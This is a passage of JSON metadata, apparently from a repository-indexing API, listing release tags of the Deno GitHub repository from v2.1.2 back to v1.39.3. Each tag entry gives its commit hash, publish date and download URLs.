no@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F